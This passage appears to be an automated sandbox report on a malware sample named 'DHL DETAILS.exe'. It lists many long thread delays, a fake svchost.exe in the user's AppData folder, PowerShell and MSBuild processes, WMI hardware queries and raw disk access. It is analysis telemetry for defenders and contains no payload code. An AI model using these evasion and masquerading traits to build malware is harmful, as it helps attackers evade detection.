                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -56125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -55906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -55625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -55444s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -55234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -54859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -52391s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -52016s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -51906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -51703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -51341s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -51156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -50984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -50818s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -50656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -50459s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -50266s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -50104s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -49859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe TID: 47676Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 66696Thread sleep count: 1536 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 70016Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 64920Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -100000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 58276Thread sleep count: 337 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -97891s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -97594s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -97360s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -97047s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -96781s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -96578s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -96266s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -96016s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -95766s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -95578s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -95391s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -95109s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -94875s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 56464Thread sleep time: -94716s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 99875Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 99764Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 99544Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 99406Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 99293Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 99187Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 99078Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 98965Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 98763Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 98655Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 98546Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 98437Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 98325Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 98202Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 98091Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 97980Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 97866Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 97749Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99704Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99593Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99375Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99098Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98905Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98737Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98472Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97166Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97031Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96899Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96791Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 95453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94906Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90755Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90625Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90497Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90387Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90259Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90136Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89791Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76875Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73312Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 70937Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 67375Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 65000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 64718Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 62625Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 55468Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 53125Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 48375Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 46000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 43625Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 41329Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 38954Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 36579Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 34204Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 31829Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 100000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99872
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99765
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99646
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99525
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99405
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99295
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99184
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99068
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98938
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98822
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98717
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98608
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98467
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98354
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98156
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97995
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97888
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97768
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97640
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97500
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97359
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97218
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97082
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96960
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96828
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96716
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96543
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 100000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99843
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99714
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99606
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99485
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99370
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99223
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99093
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98961
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98790
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98667
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98515
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98384
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98274
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98119
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97965
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97738
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97531
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97375
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96814
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96623
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94781
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94594
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94441
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94234
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94021
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93844
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93730
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93604
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93498
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93383
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93047
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92888
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92701
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92469
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92328
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92166
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91867
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91672
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91531
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91391
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91234
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91068
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90931
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90746
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90624
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90463
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90334
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90156
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89955
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89817
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89688
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89536
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89398
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89209
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89039
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 88766
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 88618
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 88468
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 88219
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 88070
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 87947
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 87759
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 87531
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 87414
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 87234
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 87000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 86859
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 86719
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 86406
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 85703
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 85216
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 85090
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84906
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84749
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84172
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84009
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83859
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83688
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83557
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83410
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83266
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83078
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82945
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82818
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82641
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82453
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82277
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82094
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81920
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81781
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81617
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81469
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81340
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80819
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80609
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80428
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80234
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 79797
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 79094
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 77266
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76985
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76766
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76572
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76328
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76106
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75719
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75500
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75281
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75150
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74839
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74729
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74578
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74422
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74263
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74125
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73994
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73844
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73541
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73344
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73184
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 72838
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 72547
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 71781
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 71313
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 71152
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 70922
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 70700
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 70516
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 70297
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 70110
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 69891
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 69719
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 69585
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 69434
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 68594
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 68344
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 68139
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 67983
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99716
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98693
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98224
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97485
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97157
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96823
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96407
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96078
